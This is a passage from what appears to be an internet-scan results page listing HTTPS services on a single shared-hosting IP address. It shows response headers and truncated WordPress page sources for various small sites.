href="https://hijaziparliament.com/feed/" />
    <link rel="alternate" type="application/rss+xml" title=" &laquo; خلاصة التعليقات" href="https://hijaziparliament.com/comments/feed/" />
    
    		<style type="text/css">
    			:root{				
    			--tie-preset-gradient-1: linear-gradient(135deg, rgba(6, 147, 227, 1) 0%, rgb(155, 81, 224) 100%);
    			--tie-preset-gradient-2: linear-gradient(135deg, rgb(122, 220, 180) 0%, rgb(0, 208, 130) 100%);
    			--tie-preset-gradient-3: linear-gradient(135deg, rgba(252, 185, 0, 1) 0%, rgba(255, 105, 0, 1) 100%);
    			--tie-preset-gradient-4: linear-gradient(135deg, rgba(255, 105, 0, 1) 0%, rgb(207, 46, 46) 100%);
    			--tie-preset-gradient-5: linear-gradient(135deg, rgb(238, 238, 238) 0%, rgb(169, 184, 195) 100%);
    			--tie-preset-gradient-6: linear-gradient(135deg, rgb(74, 234, 220) 0%, rgb(151, 120, 209) 20%, rgb(207, 42, 186) 40%, rgb(238, 44, 130) 60%, rgb(251, 105, 98) 80%, rgb(254, 248, 76) 100%);
    			--tie-preset-gradient-7: linear-gradient(135deg, rgb(255, 206, 236) 0%, rgb(152, 150, 240) 100%);
    			--tie-preset-gradient-8: linear-gradient(135deg, rgb(254, 205, 165) 0%, rgb(254, 45, 45) 50%, rgb(107, 0, 62) 100%);
    			--tie-preset-gradient-9: linear-gradient(135deg, rgb(255, 203, 112) 0%, rgb(199, 81, 192) 50%, rgb(65, 88, 208) 100%);
    			--tie-preset-gradient-10: linear-gradient(135deg, rgb(255, 245, 203) 0%, rgb(182, 227, 212) 50%, rgb(51, 167, 181) 100%);
    			--tie-preset-gradient-11: linear-gradient(135deg, rgb(202, 248, 128) 0%, rgb(113, 206, 126) 100%);
    			--tie-preset-gradient-12: linear-gradient(135deg, rgb(2, 3, 129) 0%, rgb(40, 116, 252) 100%);
    			--tie-preset-gradient-13: linear-gradient(135deg, #4D34FA, #ad34fa);
    			--tie-preset-gradient-14: linear-gradient(135deg, #0057FF, #31B5FF);
    			--tie-preset-gradient-15: linear-gradient(135deg, #FF007A, #FF81BD);
    			--tie-preset-gradient-16: linear-gradient(135deg, #14111E, #4B4462);
    			--tie-preset-gradient-17: linear-gradient(135deg, #F32758, #FFC581);
    
    			
    					--main-nav-background: #1f2024;
    					--main-nav-secondry-background: rgba(0,0,0,0.2);
    					--main-nav-primary-color: #0088ff;
    					--main-nav-contrast-primary-color: #FFF
    Found 2025-12-31 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.mirental.ca

    2025-12-23 09:47

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://mirental.ca/
    x-litespeed-cache: miss
    content-length: 0
    date: Tue, 23 Dec 2025 09:48:01 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.paraparappucheithi.com

    2025-12-23 09:33

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://paraparappucheithi.com/
    x-litespeed-cache: hit
    content-length: 0
    date: Tue, 23 Dec 2025 09:33:04 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.hyper.meme

    2025-12-23 09:30

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://hyper.meme/
    x-litespeed-cache: miss
    content-length: 0
    date: Tue, 23 Dec 2025 09:30:06 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · telefonoip.cl

    2025-12-23 08:52

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://www.telefonoip.cl/
    content-length: 0
    date: Tue, 23 Dec 2025 08:52:25 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · gigachud.net

    2025-12-23 08:49

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://gigachud.net/wp-json/>; rel="https://api.w.org/"
    link: <https://gigachud.net/wp-json/wp/v2/pages/7>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://gigachud.net/>; rel=shortlink
    transfer-encoding: chunked
    date: Tue, 23 Dec 2025 08:49:52 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · thebronxjournal.com

    2025-12-23 08:03

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://thebronxjournal.com/wp-json/>; rel="https://api.w.org/"
    link: <https://thebronxjournal.com/wp-json/wp/v2/pages/1643>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://thebronxjournal.com/>; rel=shortlink
    transfer-encoding: chunked
    date: Tue, 23 Dec 2025 08:03:47 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.tiopelon.devdecimosite2025.com

    2025-12-23 07:55

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://tiopelon.devdecimosite2025.com/
    x-litespeed-cache: miss
    content-length: 1
    date: Tue, 23 Dec 2025 07:55:59 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.altdiversify.com

    2025-12-23 07:53

    HTTP/1.1 503 Service Unavailable
    keep-alive: timeout=5, max=100
    x-powered-by: PHP/8.4.15
    retry-after: 86400
    expires: Wed, 11 Jan 1984 05:00:00 GMT
    cache-control: no-cache; private
    content-type: text/html; charset=UTF-8
    last-modified: Tue, 23 Dec 2025 07:53:51 GMT
    etag: "c040f4c5e472d8fe8ce3fb62d4eaf8bf"
    content-length: 7539
    date: Tue, 23 Dec 2025 07:53:51 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Alt-Diversify
    
    <!DOCTYPE html>
    
    <html dir="ltr" lang="en-US" prefix="og: https://ogp.me/ns#">
        <head>
        	<meta charset="UTF-8">
        	<meta name="viewport" content="width=device-width, initial-scale=1">
    
            <!-- SEO -->
    <title>Alt-Diversify</title><meta name="description" content="Software Solutions | Creative | Web &amp; Mobile Apps | Production"/>
    <!-- og meta for facebook, googleplus -->
    <meta property="og:title" content="Alt-Diversify"/>
    <meta property="og:description" content="Software Solutions | Creative | Web &amp; Mobile Apps | Production"/>
    <meta property="og:url" content="https://www.altdiversify.com"/>
    <meta property="og:type" content="website" />
    <meta property="og:image" content=""/>
    
    <!-- twitter meta -->
    <meta name="twitter:card" content="summary_large_image"/>
    <meta name="twitter:title" content="Alt-Diversify"/>
    <meta name="twitter:description" content="Software Solutions | Creative | Web &amp; Mobile Apps | Production"/>
    <meta name="twitter:url" content="https://www.altdiversify.com"/>
    <meta name="twitter:image" content=""/>
    
    <link rel="icon" href="https://www.altdiversify.com/wp-content/uploads/2022/03/cropped-Alt-logo-32x32.png" sizes="32x32" />
    <link rel="icon" href="https://www.altdiversify.com/wp-content/uploads/2022/03/cropped-Alt-logo-192x192.png" sizes="192x192" />
    <link rel="apple-touch-icon" href="https://www.altdiversify.com/wp-content/uploads/2022/03/cropped-Alt-logo-180x180.png" />
    <meta name="msapplication-TileImage" content="https://www.altdiversify.com/wp-content/uploads/2022/03/cropped-Alt-logo-270x270.png" />
    <link rel="stylesheet" href="https://www.altdiversify.com/wp-content/plugins/cmp-coming-soon-maintenance/themes/hardwork/style.css?v=4.1.16" type="text/css" media="all">
    <link rel="stylesheet" href="https://www.altdiversify.com/wp-content/plugins/cmp-coming-soon-maintenance/css/animate.min.css">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" rel="stylesheet" >
    <link href="https://fonts.googleapis.com/css?family=Playfair+Display:700%7CMontserrat:400,700,400&amp;subset=latin-ext,cyrillic,latin,vietnamese,cyrillic-ext" rel="stylesheet">
    
    
            <style>
                body,input {font-family:'Montserrat', 'sans-serif';color:#ffffff;}
                                .social-list {background-color: rgba(0,0,0,0.4);}
                                a {color:#ffffff;}
                h1,h2,h3,h4,h5,h6 {font-family:'Playfair Display', 'sans-serif';}
                body {font-size:17px; letter-spacing: 0px; font-weight:400;; }
                h1:not(.text-logo),h2, h3,h4,h5,h6,.text-logo-wrapper {font-size:2.3529411764706em;letter-spacing: 0px; font-weight:700;font-style: normal;; }
                h1 {font-weight:700;font-style: normal;;}
            </style>
    
            
    
    <style>
        .wp-video {margin: 0 auto;}
        .wp-video-shortcode {max-width: 100%;}
        .grecaptcha-badge {display: none!important;}
        .text-logo {display: inline-block;}
        #gdpr-checkbox {-webkit-appearance: checkbox;-moz-appearance: checkbox;width: initial;height: initial;}
        #counter.expired {display: none; }
        input, button {
            box-shadow: inset 0 0 0 0 !important;
            -webkit-box-shadow: inset 0 0 0 0 !important;
            -webkit-appearance: none;
            outline: none;
        }
    </style>
    
    
    
    
        </head>
    
    
        <body id="body">
            <div id="background-wrapper">
    
             <div id="background-image" class="color loaded" style="background-color:#000000"></div>
            </div>
    
            
            <section class="section section-body">
                <div class="logo-wrapper text text-logo-wrapper"><a href="https://www.altdiversify.com" style="text-decoration:none;color:inherit"><h1 class="text-logo">Alt-Diversify</h1></a></div><h2 class="cmp-title animated ">Coming Soon</h2>         
             </section>
            
        <!-- Fade in background image after load -->
        <script>
            window.addEventListener("load",function(event) {
                init();
            });
    
            function init(){
    
                var image = document.getElementById
    Found 2025-12-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.jadecare.co.uk

    2025-12-23 07:49

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    expires: Wed, 11 Jan 1984 05:00:00 GMT
    cache-control: no-cache; private
    content-length: 6368
    date: Tue, 23 Dec 2025 07:49:03 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: My Blog
    
    <!DOCTYPE html>
    
    <html lang="en-US">
        <head>
        	<meta charset="UTF-8">
        	<meta name="viewport" content="width=device-width, initial-scale=1">
    
            <!-- SEO -->
    <title>My Blog</title><meta name="description" content="My WordPress Blog"/>
    <!-- og meta for facebook, googleplus -->
    <meta property="og:title" content="My Blog"/>
    <meta property="og:description" content="My WordPress Blog"/>
    <meta property="og:url" content="https://jadecare.co.uk"/>
    <meta property="og:type" content="website" />
    <meta property="og:image" content="https://jadecare.co.uk/wp-content/uploads/2025/10/Jadecare-slide2-1024x576.jpg"/>
    
    <!-- twitter meta -->
    <meta name="twitter:card" content="summary_large_image"/>
    <meta name="twitter:title" content="My Blog"/>
    <meta name="twitter:description" content="My WordPress Blog"/>
    <meta name="twitter:url" content="https://jadecare.co.uk"/>
    <meta name="twitter:image" content="https://jadecare.co.uk/wp-content/uploads/2025/10/Jadecare-slide2-1024x576.jpg"/>
    
    <link rel="stylesheet" href="https://jadecare.co.uk/wp-content/plugins/cmp-coming-soon-maintenance/themes/hardwork/style.css?v=4.1.15" type="text/css" media="all">
    <link rel="stylesheet" href="https://jadecare.co.uk/wp-content/plugins/cmp-coming-soon-maintenance/css/animate.min.css">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" rel="stylesheet" >
    <link href="https://fonts.googleapis.com/css?family=Playfair+Display:700%7CMontserrat:400,700,400&amp;subset=latin-ext,cyrillic,latin,vietnamese,cyrillic-ext" rel="stylesheet">
    
    
            <style>
                body,input {font-family:'Montserrat', 'sans-serif';color:#ffffff;}
                                .social-list {background-color: rgba(0,0,0,0.4);}
                                a {color:#ffffff;}
                h1,h2,h3,h4,h5,h6 {font-family:'Playfair Display', 'sans-serif';}
                body {font-size:17px; letter-spacing: 0px; font-weight:400;; }
                h1:not(.text-logo),h2, h3,h4,h5,h6,.text-logo-wrapper {font-size:2.3529411764706em;letter-spacing: 0px; font-weight:700;font-style: normal;; }
                h1 {font-weight:700;font-style: normal;;}
            </style>
    
            
    
    <style>
        .wp-video {margin: 0 auto;}
        .wp-video-shortcode {max-width: 100%;}
        .grecaptcha-badge {display: none!important;}
        .text-logo {display: inline-block;}
        #gdpr-checkbox {-webkit-appearance: checkbox;-moz-appearance: checkbox;width: initial;height: initial;}
        #counter.expired {display: none; }
        input, button {
            box-shadow: inset 0 0 0 0 !important;
            -webkit-box-shadow: inset 0 0 0 0 !important;
            -webkit-appearance: none;
            outline: none;
        }
    </style>
    
    
    
    
        </head>
    
    
        <body id="body">
            <div id="background-wrapper">
    
             <div id="background-image" class="image" style="background-image:url('https://jadecare.co.uk/wp-content/uploads/2025/10/Jadecare-slide2.jpg')"></div>
            </div>
    
            
            <section class="section section-body">
                         
             </section>
            
        <!-- Fade in background image after load -->
        <script>
            window.addEventListener("load",function(event) {
                init();
            });
    
            function init(){
    
                var image = document.getElementById('background-image');
                var body = document.getElementById('body');
                
                if ( image === null ) {
                    image = document.getElementById('body');
                } 
    
                if ( image != null ) {
                    if ( image.className !== 'image-unsplash') {
                        image.classList.add('loaded');
                        body.classList.add('loaded');
                    }
                }
    
                        }
        </script>
    
        
        <script>
            /* Subscribe form script */
            var ajaxWpUrl = 'https://jadecare.co.uk/wp-admin/admin-ajax.php';
            var {pathname} = new URL(ajaxWpUrl);
            var ajaxurl = `${location.protocol}//${location.hostname}${pathname}`;
            var
    Found 2025-12-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · heypmi.com

    2025-12-23 07:42

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://heypmi.com/wp-json/>; rel="https://api.w.org/"
    link: <https://heypmi.com/wp-json/wp/v2/pages/7>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://heypmi.com/>; rel=shortlink
    etag: "771-1766475738;;;"
    x-litespeed-cache: miss
    content-length: 21610
    date: Tue, 23 Dec 2025 07:42:18 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Heyp Mi – Viral TikTok Meme
    
    <!DOCTYPE html>
    <html lang="en-US">
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Heyp Mi &#8211; Viral TikTok Meme</title>
    <meta name='robots' content='max-image-preview:large' />
    	<style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>
    	<link rel='dns-prefetch' href='//fonts.googleapis.com' />
    <link rel="alternate" type="application/rss+xml" title="Heyp Mi &raquo; Feed" href="https://heypmi.com/feed/" />
    <link rel="alternate" type="application/rss+xml" title="Heyp Mi &raquo; Comments Feed" href="https://heypmi.com/comments/feed/" />
    <script>
    window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/16.0.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/16.0.1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/heypmi.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.8.3"}};
    /*! This file is auto-generated */
    !function(s,n){var o,i,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),a=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===a[t]})}function u(e,t){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);for(var n=e.getImageData(16,16,1,1),a=0;a<n.data.length;a++)if(0!==n.data[a])return!1;return!0}function f(e,t,n,a){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\udde8\ud83c\uddf6","\ud83c\udde8\u200b\ud83c\uddf6")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!a(e,"\ud83e\udedf")}return!1}function g(e,t,n,a){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):s.createElement("canvas"),o=r.getContext("2d",{willReadFrequently:!0}),i=(o.textBaseline="top",o.font="600 32px Arial",{});return e.forEach(function(e){i[e]=t(o,e,n,a)}),i}function t(e){var t=s.createElement("script");t.src=e,t.defer=!0,s.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",i=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){s.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+g.toString()+"("+[JSON.stringify(i),f.toString(),p.toString(),u.toString()].join(",")+"));",a=new Blob([e],{type:"text/javascript"}),r=new Worker(URL.createObjectURL(a),{name:"wpTestEmojiSupports"});return void(r.onmessage=function(e){c(n=e.data),r.terminate(),t(n)})}catch(e){}c(n=g(i,f,p,u))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);
    </script>
    <link rel="preconnect" href="https://fonts.gstatic
    Found 2025-12-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · petunia.lol

    2025-12-23 07:40

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://petunia.lol/index.php?rest_route=/>; rel="https://api.w.org/"
    link: <https://petunia.lol/index.php?rest_route=/wp/v2/pages/7>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://petunia.lol/>; rel=shortlink
    content-length: 32793
    date: Tue, 23 Dec 2025 07:41:00 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Petunia BSC – The Face of BSC
    
    <!DOCTYPE html>
    <html lang="en-US">
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Petunia BSC &#8211; The Face of BSC</title>
    <meta name='robots' content='max-image-preview:large' />
    <link rel='dns-prefetch' href='//fonts.googleapis.com' />
    <link rel="alternate" type="application/rss+xml" title="Petunia BSC &raquo; Feed" href="https://petunia.lol/?feed=rss2" />
    <link rel="alternate" type="application/rss+xml" title="Petunia BSC &raquo; Comments Feed" href="https://petunia.lol/?feed=comments-rss2" />
    <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://petunia.lol/index.php?rest_route=%2Foembed%2F1.0%2Fembed&#038;url=https%3A%2F%2Fpetunia.lol%2F" />
    <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://petunia.lol/index.php?rest_route=%2Foembed%2F1.0%2Fembed&#038;url=https%3A%2F%2Fpetunia.lol%2F&#038;format=xml" />
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><style id='wp-img-auto-sizes-contain-inline-css'>
    img:is([sizes=auto i],[sizes^="auto," i]){contain-intrinsic-size:3000px 1500px}
    /*# sourceURL=wp-img-auto-sizes-contain-inline-css */
    </style>
    <style id='wp-emoji-styles-inline-css'>
    
    	img.wp-smiley, img.emoji {
    		display: inline !important;
    		border: none !important;
    		box-shadow: none !important;
    		height: 1em !important;
    		width: 1em !important;
    		margin: 0 0.07em !important;
    		vertical-align: -0.1em !important;
    		background: none !important;
    		padding: 0 !important;
    	}
    /*# sourceURL=wp-emoji-styles-inline-css */
    </style>
    <style id='classic-theme-styles-inline-css'>
    /*! This file is auto-generated */
    .wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}
    /*# sourceURL=/wp-includes/css/classic-themes.min.css */
    </style>
    <link rel='stylesheet' id='bricks-frontend-css' href='https://petunia.lol/wp-content/themes/bricks/assets/css/frontend.min.css?ver=1740055010' media='all' />
    <style id='bricks-frontend-inline-inline-css'>
    :root {}#brxe-kgtxgh {align-self: center !important}#brxe-nslaza {justify-content: center; align-self: center !important}#brxe-wheumr {align-self: center !important}#brxe-fkbqom {padding-top: 25px; padding-right: 125px; padding-bottom: 25px; padding-left: 125px; font-family: "Montserrat"; font-weight: 800; color: #212121; font-size: 25px; border-width: 15px}@media (max-width: 478px) {#brxe-fkbqom {padding-top: 15px; padding-right: 25px; padding-bottom: 15px; padding-left: 25px; font-size: 16px}}#brxe-qfspeu {align-self: center !important}#brxe-mmdufc {justify-content: flex-end; align-self: center !important}@media (max-width: 478px) {#brxe-mmdufc {margin-top: 25px}}#brxe-fyhnwm {margin-top: 150px}@media (max-width: 478px) {#brxe-fyhnwm {padding-top: 25px; padding-right: 25px; padding-bottom: 25px; padding-left: 52px}}#brxe-adobdh {background-image: url(https://petunia.lol/wp-content/uploads/2025/02/petunia-bg-header-1024x577.jpg); background-size: cover; height: 100vh; padding-top: 0; padding-bottom: 0; border-radius: 15px}@media (max-width: 478px) {#brxe-adobdh {width: 100%}}
    /*# sourceURL=bricks-frontend-inline-inline-css */
    </style>
    <link rel='stylesheet' id='bricks-google-fonts-css' href='https://fonts.googleapis.com/css2?family=Montserrat:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&#038;display=swap' media='all' />
    <link rel="https://api.w.org/" href="https://petunia.lol/index.php?rest_route=/" /><link rel="alternate" title="JSON" type="application/json" href="https://petunia.lol/index.php?rest_route=/wp/v2/pages/7" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://petunia.lol/xmlrpc.php?rsd" />
    <meta name="generator" content="WordPress 6.9" />
    <link rel="canonical" href="https://petunia.lol/" />
    <link rel='shortlink' href='https://petunia.lol/' />
    
    <!-- F
    Found 2025-12-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.menarapool.com

    2025-12-23 07:18

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://menarapool.com/
    x-litespeed-cache: miss
    content-length: 0
    date: Tue, 23 Dec 2025 07:18:50 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.store.goyam.online

    2025-12-23 07:16

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://store.goyam.online/
    x-litespeed-cache: miss
    content-length: 0
    date: Tue, 23 Dec 2025 07:16:55 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · shunslab.com

    2025-12-23 06:59

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://www.shunslab.com/
    cache-control: public, max-age=0
    expires: Tue, 23 Dec 2025 07:00:02 GMT
    content-length: 0
    date: Tue, 23 Dec 2025 07:00:02 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · menarapool.com

    2025-12-23 06:46

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://menarapool.com/wp-json/>; rel="https://api.w.org/"
    link: <https://menarapool.com/wp-json/wp/v2/pages/323>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://menarapool.com/>; rel=shortlink
    etag: "3068-1766411918;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Tue, 23 Dec 2025 06:46:37 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.heypmi.com

    2025-12-23 06:29

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://heypmi.com/
    x-litespeed-cache: miss
    content-length: 0
    date: Tue, 23 Dec 2025 06:29:41 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.blobby.me

    2025-12-23 05:21

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://blobby.me/
    x-litespeed-cache: miss
    content-length: 0
    date: Tue, 23 Dec 2025 05:21:51 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · blog.jobrh.com

    2025-12-23 04:54

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://blog.jobrh.com/index.php?rest_route=/>; rel="https://api.w.org/"
    link: <https://blog.jobrh.com/index.php?rest_route=/wp/v2/pages/15>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://blog.jobrh.com/>; rel=shortlink
    transfer-encoding: chunked
    date: Tue, 23 Dec 2025 04:54:18 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · brilliantsit.com

    2025-12-23 04:44

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Tue, 23 Dec 2025 04:44:10 GMT
    server: LiteSpeed
    location: https://ninetyninecreatives.com/wp-content/cache/wp-rocket/brilliantsit.com/index-https.html
    vary: Accept-Encoding
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  301 Moved Permanently
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 301 Moved Permanently
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently
    </h2>
    <p>The document has been permanently moved.</p>
    </div></div></body></html>
    
    Found 2025-12-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · lahorwaters.com

    2025-12-23 04:43

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://lahorwaters.com/wp-json/>; rel="https://api.w.org/"
    link: <https://lahorwaters.com/wp-json/wp/v2/pages/21574>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://lahorwaters.com/>; rel=shortlink
    etag: "556-1766455587;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Tue, 23 Dec 2025 04:43:11 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2025-12-23 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.lahorwaters.com

    2025-12-23 03:42

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://lahorwaters.com/
    x-litespeed-cache: miss
    content-length: 0
    date: Tue, 23 Dec 2025 03:43:01 GMT
